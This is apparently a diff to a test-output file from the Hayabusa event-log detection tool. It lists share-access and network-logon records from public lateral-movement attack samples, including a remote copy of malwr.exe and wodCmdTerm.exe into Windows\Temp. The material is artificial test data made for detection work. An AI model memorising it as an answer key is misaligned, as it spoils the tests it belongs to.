+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
